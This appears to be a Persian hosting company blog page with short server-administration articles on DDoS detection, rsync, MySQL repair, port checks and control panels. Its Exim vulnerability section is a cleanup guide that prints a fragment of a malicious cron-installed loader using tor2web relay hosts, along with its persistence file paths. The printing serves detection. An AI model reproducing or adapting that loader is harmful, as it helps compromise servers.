در صورتی که از یک شرکت هاستینگ اقدام به خرید سرور اختصاصی می کنید، یکی از روش های مفید برای دسترسی به سرور اتصال از طریق ریموت است. روش های مختلفی برای اتصال از طریق ریموت وجود دارد. در ادامه دو روش اتصال از طریق RDP و KVM را با یکدیگر مقایسه می کنیم.
فهرست مطالب: سرور اختصاصی
سرور اختصاصی
جلوگیری از حملات DDOS در سرور های مجازی تحت ویندوز
در این مقاله به نحوه جلوگیری از حملات DDOS بر روی سرور مجازی VPS خواهیم پرداخت این روش بر روی همه نسخه های ویندوز Windows DNS (2003/2008/2012) قابل استفاده است. دو حالت وجود دارد که در ادامه به توضیح آنها می پردازیم.
حالت اول : از DNS server سرور مجازی برای اتصال آن به دامنه های خارجی استفاده شده است.
اگر DNS server را در ویندوز VPS خود نصب کرده اید و forwarders روشن است ، باید Windows Firewall را پیکربندی کنید تا کاربران، دیگر نتواننداز DNS server شما استفاده کنند.
تمام کاری که باید انجام بدهید این است که DNS TCP/UDP Incoming firewall rules را در تب Scope تغییر دهید و IP هایی که می خواهید به DNS server دسترسی داشته باشند را در آن قسمت اضافه کنید.
نکته : اگر در سرورهای دیگر به Windows Active Directory domain متصل می شوید باید مطمئن شوید که آدرسهای IP سرور دیگر را به بخش “Remote IP Address” اضافه کرده اید.
تشخیص حمله DDoS بر روی سرور لینوکس
سرورها در یک شرکت هاستینگ ممکن است به دفعات دچار حملات متعددی شوند. یکی از این حملات حمله DDoS می باشد. برای تشخیص این نوع حملات DDoS (از جمله حمله SYN و GET و غیره) روی سرورهای لینوکسی می توانید از دستور زیر استفاده نمایید:
1 |
netstat -nat | awk '{print $6}' | sort | uniq -c |
سپس برای لیست کردن تمامی IPهای متصل به سرور از دستور زیر استفاده می کنیم به ترتیب نزولی تعداد اتصال مرتب شده اند:
1 |
netstat -plan|grep :80|awk {'print $5'}|cut -d: -f 1|sort|uniq -c|sort -nk 1 |
همچنین شما می توانید ببینید که کدام دامنه ها بیشترین فعالیت را داشته اند (در نمونه حمله GET).
1 2 |
cd /usr/local/apache/domlogs/ ls -ltr |tail -50 |
سپس می توانید ببینید که کدام IPها روی یک دامنه خاص فعال هستند و و اقدام مناسب را برای آن IP انجام دهید (به عنوان مثال بلاک کردن IP در فایروال). برای مشاهده IPها از دستور زیر استفاده کنید:
1 2 |
cd /usr/local/apache/domlogs/ tail -f <domainname> | awk {'print $1'} |
معرفی فرمان Rsync
فرمان Rsync (Remote sync) ابزاریست فوق العاده سریع برای کپی و همگام سازی فایل ها و دایرکتوری ها ، این فرمان قادر است عملیات کپی را در یک سرور محلی و یا مابین دو سرور مختلف انجام دهد. ابزار Rsync گزینه های زیادی جهت کنترل عمیات کپی بر روی فایل ها ارائه می دهد.
Rsync از الگوریتم delta-transfer برای کپی کردن فایل ها استفاده می کند. این الگوریتم تنها تفاوت ها بین فایل های مبدا و فایل های موجود در مقصد را انتقال می دهد. و همین امر باعث کاهش داده های ارسال شده در شبکه می شود. ادامه مطلب
انتخاب یک سرویس وب هاست خوب و قابل اطمینان
نکاتی برای انتخاب یک سرویس وب هاستینگ
وب هاستینگ به شما اجازه می دهد که وب سایت خود را به روش های مختلفی سفارشی سازی کنید به گونه ای که ردر زمان دلخواه بتوانید تغییرات مورد نظر را اعمال کنید. این نکته را باید در نظر داشت که بهترین روش برای نگهداری وب سایت روی اینترنت استفاده از وب هاستینگ است و هنگامی که نام دامنه خود را انتخاب کردید و ثبت دامنه را انجام دادید، باید وب سایت خود را ایجاد کنید تا اینکه بتوانید در آینده نرخ ترافیک بالاتری داشته باشید. وب هاستینگ های مختلفی وجود دارد که بتوانید با توجه به نیاز خود یکی از آنها را انتخاب کنید. برای شرکت های تجاری که به تازگی وارد بازار کار شده اند، استفاده از سرویس هاستیگ بهترین روش برای معرفی و کسب شهرت در کوتاهترین زمان است و این کار در مقایسه با سرویس های سرور اختصاصی هزینه کمتری را به دنبال دارد.
رفع خطای Table matomo_log_x is marked as crashed and last (automatic?) repair failed
ممکن است برای شما که با سرور و هاست سروکار داربد، پیش آمده باشد که با خطای Table matomo_log_x is marked as crashed and last (automatic?) repair failed برخورده باشید. این خطا بدین معنی است که جداول Mysql دچار مشکل شده است (خراب شده) و باید درست شود. این خطا به ندرت رخ می دهد و دلایل متعددی می تواند داشته باشد که از جمله آن می توان به نبود فضای کافی روی دیسک اشاره کرد.
برای حل این مشکل باید به سرور Mysql متصل شوید و query زیر را اجرا کنید:
1 |
REPAIR TABLE matomo_log_visit; |
فقط این نکته را در نظر داشته باشید که باید matomo_log_visit
را با نام جدول معیوب خود که در پیام خطا مشاهده می کنید، جایگزین کنید.
اما اگر با دستور فوق مشکل شما حل نشد در اینصورت از روش زیر استفاده کنید:
1 2 |
cd /var/lib/mysql/your_matomo_database myisamchk -r -v ./your_table_repair |
هم اکنون باید جداول معیوب شما اصلاح شده و قابل استفاده باشند.
مشکل امنیتی exim
بر اساس گزارش اخیر در رابطه با مشکل امنیتی Exim این حفره امنیتی مشکلات متعددی را برای سرور های دارای نرم افزار exim ایجاد کرده است و میلیون ها سرور تحت تاثیر این موضوع قرار گرفته اند. این نرم افزار بر روی سرور های سی پنل نیز به شکل گسترده استفاده میشود و لازم است در این خصوص اقدامات لازم صورت گیرد.
چگونه ورژن Exim را در سی پنل کنترل کنیم ؟
با استفاده از این دستور میتوانیم نسخه Exim را کنترل کنیم و در صورتی که خارج از این محدوده قرار داشت لازم است بروز رسانی صورت گیرد.
کنترل ورژن :
1 2 3 4 5 |
rpm -q exim whmapi1 installed_versions packages=1|grep exim exim --version |
اطلاعات بیشتر در خصوص ورژن را میتوانید از این لینک در اختیار داشته باشید :
در صورتی که سرور آسیب دیده باشد :
موارد زیر تاکنون در این سرور ها مشاهده شده است و پیشنهاد میگردد انجام شود
۱) باید سرویس cron را متوقف نمایید چرا که این سرویس در crontab شما تغییراتی ایجاد کرده است.
service crond stop
۲) احتمالا سرویس زیر در حافظه سرور در حال اجراست و لازم است آن را متوقف نمایید
pkill -9 -f kthrotlds
برای اطمینان از اینکه از حافظه حذف شده است از دستور زیر استفاده نمایید
ps aux | grep kthrotlds
۳) فایل زیر را حذف نمایید این فایل همان فایلی است که در حافظه سرور شما بارگذاری میشود
/usr/bin/[kthrotlds]
۴) کران جاب های آلوده را با دستور زیر میتوانید پیدا کنید
grep -r passwd /var/spool/cron*
۵)
مسیر های زیر را برای یافتن کدهای مخرب رسد کنید :
1 2 3 |
/etc/ /root/ /usr/local/bin |
برای مشاهده فایل های تغییر یافته در ۵ روز گذشته چنین دستوری میتواند کمک کند
1 |
find /etc/ -mtime -5 -print |
نمونه کد مخرب مشابه زیر است
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
#!/bin/sh SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin RHOST=”https://an7kmd2wp4xo7hpr” TOR1=”.tor2web.su/” TOR2=”.tor2web.io/” TOR3=”.onion.sh/” RPATH1=’src/ldm’ #LPATH=”${HOME-/tmp}/.cache/” TIMEOUT=”75″ CTIMEOUT=”22″ COPTS=” -fsSLk –retry 2 –connect-timeout ${CTIMEOUT} –max-time ${TIMEOUT} ” WOPTS=” –quiet –tries=2 –wait=5 –no-check-certificate –connect-timeout=${CTIMEOUT} –timeout=${TIMEOUT} ” tbin=$(command -v passwd); bpath=$(dirname “${tbin}”) curl=”curl”; if [ $(curl –version 2>/dev/null|grep “curl “|wc -l) -eq 0 ]; then curl=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “CURLOPT_VERBOSE” && curl=”$f” && break; done; fi; fi wget=”wget”; if [ $(wget –version 2>/dev/null|grep “wgetrc “|wc -l) -eq 0 ]; then wget=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “.wgetrc’-style command” && wget=”$f” && break; done; fi; fi #CHKCURL=’curl=”curl “; wget=”wget “; if [ “$(whoami)” = “root” ]; then if [ $(command -v curl|wc -l) -eq 0 ]; then curl=$(ls /usr/bin|grep -i url|head -n 1); fi; if [ -z ${curl} ]; then curl=”echo “; fi; if [ $(command -v wget|wc -l) -eq 0 ]; then wget=$(ls /usr/bin|grep -i wget|head -n 1); fi; if [ -z ${wget} ]; then wget=”echo “; fi; if [ $(cat /etc/hosts|grep -i “.onion.”|wc -l) -ne 0 ]; then echo “127.0.0.1 localhost” > /etc/hosts >/dev/null 2>&1; fi; fi; ‘ CHKCURL=’tbin=$(command -v passwd); bpath=$(dirname “${tbin}”); curl=”curl”; if [ $(curl –version 2>/dev/null|grep “curl “|wc -l) -eq 0 ]; then curl=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “CURLOPT_VERBOSE” && curl=”$f” && break; done; fi; fi; wget=”wget”; if [ $(wget –version 2>/dev/null|grep “wgetrc “|wc -l) -eq 0 ]; then wget=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “to ” && wget=”$f” && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i “.onion.”|wc -l) -ne 0 ]; then echo “127.0.0.1 localhost” > /etc/hosts >/dev/null 2>&1; fi; ‘ LBIN8=”kthrotlds” null=’ >/dev/null 2>&1′ |
۶) مسیر های زیر را به دقت بررسی و authorized_keys را حذف نمایید
1 |
/root/.ssh/authorized_keys, /etc/cron.d, /etc/cron.daily, /etc/cron.weekly, /etc/cron.monthly |
۷) این فایل ها مشکوک هستند و پس از اطمینان آنها را خذف نمایید
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
/etc/cron.daily/cronlog /etc/cron.d/root /etc/cron.d/.cronbus /etc/cron.hourly/cronlog /etc/cron.monthly/cronlog /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.d/root /etc/crontab /root/.cache/ /root/.cache/a /usr/local/bin/nptd /root/.cache/.kswapd /usr/bin/\[kthrotlds\] /root/.ssh/authorized_keys /.cache/* /.cache/.sysud /.cache/.a /.cache/.favicon.ico /.cache/.kswapd /.cache/.ntp |
۸) فایل /etc/rc.local همانطوری که میدانید فایل مهمی است این فایل را با دقت برای دستور autostart جستجو کنید
۹)لازم است بعد از اعمال همه تغییرات سرور را ریبوت کنید.
استفاده از فضای بک آپ با WebDAV
اخیراْ سرویس بک آپ یا بعضی ها به عنوان هاست بک آپ آن را میشناسند توسط ایران وب هاست عرضه شده است .
بر هیچ کس پوشیده نیست که لزوم داشتن سرویس بک آپ و تهیه نسخه پشتیبان از اطلاعات تا چه میزان اهمیت دارد.
در زیر راهنمای راه اندازی سرویس بک آپ به عنوان یک درایو مستقل در سیستم عامل لینوکس با استفاده از پروتکل ارتباطی WebDav آموزش داده میشود.
برای این منظور…
مجازی سازی به روش OpenVZ یا KVM
مقایسه virtualmin و webmin و usermin
کنترل پنل رایگان Webmin
بعد از خرید سرور مجازی برای مدیریت اکانت های آن نیاز به یک کنترل پنل است که میتوان از کنترل پنل های تجاری مانند کنترل پنل سی پنل استفاده کرد یا بر اساس مطلبی که پیش تر ارایه کردیم میتوان از کنترل پنل رایگان webmin استفاده کنیم.
در یک مطلب نحوه نصب کنترل پنل رایگان Webmin را بر روی سرور مجازی لینوکس یا سرور اختصاصی لینوکس توضیح داده شد.
اما مساله ای که در رابطه با کنترل پنل وب مین توضیح داده شد این کنترل پنل پنل برای مدیریت سرور مورد استفاده قرار میگیرد و باید برای استفاده از آن دسترسی به روت سرور مجازی یا سرور اختصاصی داشت.
نصب کنترل پنل رایگان Webmin
کنترل پنل هاست یک نرم افزار است که بر روی سرور مجازی یا سرور اختصاصی قرار میگیرد و امکان مدیریت سرور را بصورت وب محیا میکند.یکی از معروفترین کنترل پنل های مدیریت سرور لینوکس کنترل پنل cPanel است.سی پنل یک کنترل پنل تجاری محسوب میشود و به دلیل پشتیبانی و بروز رسانی ها دارای لایسنس است و در صورت استفاده و نصب روی سرور مجازی یا سرور اختصاصی نیاز به فعال سازی و خرید لایسنس دارد.
در این مطلب قصد داریم روند نصب کنترل پنل وب مین که بصورت رایگان عرضه میشود و نیاز به خرید لایسنس ندارد را توضیح دهیم.
چگونه یک فلش داریو را در centos استفاده کنیم
در صورتی که یک سرور در اختیار داشته باشید ممکن است این مساله برای شما بوجود بیاید که چگونه میتوانم یک فلش usb را مورد استفاده قرار دهم.
در مثال ما یک usb فلش را بصورت fat32 توسط ویندوز 10 فرمت میکنیم. همانطور که میدانیم بصورت پیش فرض یک دایرکتوری مخفی با نام System Volume Information
بر روی داریو قرار میگیرد.
بررسی باز بودن یک پورت به کمک دستور Telnet
از دستور Telnet برای چک کردن باز و یا بسته بودن یک پورت استفاده می شود.
برای اجرای دستور Telnet در ویندوز مراحل زیر را دنبال کنید.
وارد محیط command prompt شوید.دستور زیر را در command prompt اجرا کنید.
“شماره پورت” “نام سایت و یا IP موردنظر” Telnet
مثال : telnet irwebhost.com 25
در صورتی که در جواب دستور Telnet عبارت Failed نمایش داده شود ( تصویر زیر) بدین معناست که پورت مذکور در سرور مورد نظر باز نیست و کامپیوتر شما نمی تواند با پورت مذکور در سرور مورد نظر ارتباط برقرار نمایید.
در صورتی که با اجرای دستور Telnet پیغامی مشابه تصویر زیر در صفحه نمایش داده شود این بدان معناست که پورت مورد نظر باز است و ارتباط بین کامپیوتر شما و پورت مورد نظر برقرار است.
نکته : اگر ویندوز شما 7 و یا Vista است. دستور Telnet بصورت پیش فرض در آن فعال نمی باشد و نیاز است که این دستور را بر روی ویندوز فعال نمایید. ( تصویر زیر)
برای فعال کردن دستور Telnet مراحل زیر را دنبال کنید.
وارد control panel ویندوز شده گزینه Programs and Features را یافته بر روی آن کلیک نمایید سپس بر روی گزینه Turn Windows features on or off کلیک کنید در پنجره باز شده گزینه Telnet Client را فعال کنید و در نهایت Ok کنید. حال شما این امکان را دارید که از telne استفاده کنید.
پورت هایی که معمولا استفاده می شود
لیست فوق شامل پورت هایی است که معمولا بر روی سرور ها برای ارائه سرویس استفاده می شود .
همه پورت ها بر روی یک سرور ممکن است باز نباشد.
cPanel | |
شماره پورت | نام سرویس |
2082 | cPanel |
2083 | cPanel -SSL |
2086 | WHM |
2087 | WHM -SSL |
2095 | Webmail |
2096 | Webmail -SSL |
شماره پورت | سرویس |
110 | POP3 |
995 | POP3 – SSL |
143 | IMAP |
993 | IMAP – SSL |
25 | SMTP |
26 | SMTP Alternate |
587 | SMTP Alternate |
465 | SMTP –SSL |
Web | |
شماره پورت | نام سرویس |
80 | HTTP |
443 | SSL |
21 | FTP |
990 | FTPs |
22 | SFTP |
2222 | SFTP Shared / Reseller Servers |
2077 | webdisk |
2078 | Webdisk -SSL |
3306 | My SQL |
1433 | Ms SQL |
22 | SSH |
2222 | SSH Shared /Reseller Servers |
Other | |
شماره پورت | نام سرویس |
8880 | Plesk Contrl Panel |
8443 | Plesk Control Panel – SSL |
N/A* | Plesk Linux Webmail |
9998 ** | Plesk Windows Webmail (Smarter Mail) |
4643 | Virtuozzo |
9001 | DotNet Panel |
80 | DotNet Panel Login |
4489 | RDP (Remote Desktop Protocol) |
اتصال به FTP از طریق SSH
برای این منظور وارد محیط SSH شده و دستور زیر را اجرا می کنیم.
root@srv [~]# ftp
عبارت <ftp نمایش داده می شود دستور open را اجرا می کنیم.
ftp> open
بعد از اجرای این دستور باید به سرور متصل شویم که این کار به دو صورت زیر امکان پذیر است :
1-از طریق IP
2- از طریق آدرس سایت FTP
چنانچه اتصال به صورت صحیح انجام شده باشد یوزر ftp و در خط بعدی پسورد FTP را وارد نمایید.
تغییر ورژن ASP.NET در کنترل پنل Plesk
در صورتی که در هنگام برنامه نویسی از NET FRAMEWORK ورژن 3 استفاده کرده باشید ورژن ASP.NET بر روی کنترل پنل شما می باید 3.5.30729.4926 و در صورتیکه از NET FRAMEWORK ورژن 4 استفاده کرده باشید ورژن ASP.NET بر روی کنترل پنل شما می باید 4.5.2 باشد.
به منظور تغییر ورژن ASP.NET در کنترل پنل Plesk در ابتدا وارد کنترل پنل خود شوید . از منوی سمت چپ بر روی Websites $ Domain کلیک کرده و از سمت راست گزینه ASP.NET Settings را انتخاب می کنیم.
تغییر MX Records با استفاده از WHM
MX مخفف کلمهی Mail Exchanger ( کلمهی Exchanger به معنای مبادلهکننده)
MX Record مسئول شناسایی ایمیل سرور(ها) برای دامین است.
برای تغییر MX Record وارد WHM شوید. Edit DNS Zone را جستجو کرده و بر روی آن کلیک نمایید. از لیست اکانت مورد نظر را انتخاب کرده، ورودی MX را یافته و تنظیمات مورد نظر را انجام داده و در نهایت بر روی دکمه Save کلیک نمایید.
خطای The transaction log for database ‘xxxx’ is full due to
زمانی که لاگ فایل دیتابیس sql server از حد تعریف شده بزرگتر شود این خطا بر
روی وب سایت شما یا بر روی SQL SERVER مشاهده میشود.
برای این منظور لازم است در درون سرور از طریق SQL SERVER MANAGEMENT STUDIO به دیتابیس سرور متصل شوید و موارد زیر را به دقت انجام دهید.
خالی کردن آرشیو های قدیمی ایمیل توسط مدیر سرور در سی پنل
همانطوری که قبلاً اشاره شده و همه میدانند سی پنل با ارائه گذینه ایمیل آرشیو (email archive) امکان نگهداری و آرشیو ایمیلهای ارسالی و دریافتی برای یک دامنه را در سی پنل فعال نموده است.
یک کاربر در هاست سی پنل میتواند برای مدت طولانی ایمیلهای خود را نگهداری و آرشیو نماید.
اما سوالی که ممکن است پیش بیاید چگونه میتوان آرشیو قدیمی ایمیل ها را حذف نمود.
شناسایی برنامه های مخرب روی هاست با LMD
Linux MalWare Detect یا بصورت خلاصه برنامه LMD برنامه ای برای اسکن و جستجوی برنامه های مخرب ، شل ها ، backdoor ها و حفره های امنیتی است که منجر به بروز حفره های امنیتی و در نهایت هک شدن وب سایت شما میشود.
برنامه ای که قرار است معرفی شود به maldet نیز شناخته میشود و خوشبختانه جزو برنامه های opensource است که به راحتی میتوانید روی سرور اختصاصی یا مجازی لینوکس نصب و استفاده نمایید.
در نظر داشته باشید که این برنامه مشکل امنیتی شما که به دلیل عدم بروز رسانی یا استفاده از ماژول یا اسکریپت های قدیمی است را برطرف نمیکند و فقط برای شناسایی برنامه ها و فایل های مخرب مورد استفاده قرار میگیرد.